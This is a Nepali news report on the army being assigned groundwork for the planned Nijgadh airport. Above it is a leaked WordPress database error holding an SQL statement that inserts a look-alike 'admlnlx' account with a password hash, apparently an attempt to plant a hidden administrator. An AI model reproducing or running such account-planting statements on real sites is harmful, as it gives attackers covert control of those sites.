WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BAZyRQIqj8gV0sVu7mWIIOYioL83Mh0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 20:03:25', '', 'admlnlx', 'admlnlx')
काठमाडौँ,माघ ६ –
दोस्रो अन्तर्राष्ट्रिय विमानस्थलका रुपमा निर्माण गर्न लागिएको निजगढ एयरपोर्टको ट्र्याक खोल्ने जिम्मा नेपाली सेनाले पाएको छ ।
नागरिक उड्ययन प्राधिकरणको बोर्ड बैठकले विमानस्थलसम्म पुग्ने बाटो, विमानस्थल वरिपरि निर्माण गरिने परिधीमार्ग, ट्याक्सी वे निर्माणको ट्र्याक खोल्ने काम नेपाली सेनालाई जिम्मा दिने निर्णय गरेको हो । एयरपोर्ट निर्माणका लागि आवश्यक पर्ने वनको जमिन खाली गर्न कटान गर्नुपर्ने काठको सुरक्षाको जिम्मेवारी पनि सेनाले नै पाएको छ ।

जग्गा अधिग्रहण, डीपीआर तयार पार्ने र निर्माणका लागि भने ग्लोबल टेण्डर गर्ने तयारी भइरहेको पर्यटनमन्त्री जीवनबहादुर शाहीले जानकारी दिएका छन् । तर, त्यसअघि विमानस्थल कुन मोडलबाट बनाउने राजनीतिक निर्णय गर्नुपर्ने उनले बताए ।
त्रिभुवन अन्तर्राष्ट्रिय विमानस्थलको विकल्पका रुपमा निजगढमा एयरपोर्ट बनाउने योजना अघि सारिएको थियो । यसलाई राष्ट्रिय गौरवको आयोजनामा राखिएको छ । तर, चर्चा धेरै भएपनि विमानस्थलको डीपीआर समेत बन्न सकेको छैन ।
कोरियन कन्सल्ट्यान्ट कम्पनी ल्याण्डमार्क वर्ल्डबाइड ९एलएमडब्लू०ले २०१० मा नै अध्ययन प्रतिवेदन तयार पारेको थियो । सरकारले अब उचित रकम दिएर एलएमडब्लूसँगको सम्झौता तोड्ने तयारी अघि बढाएको छ ।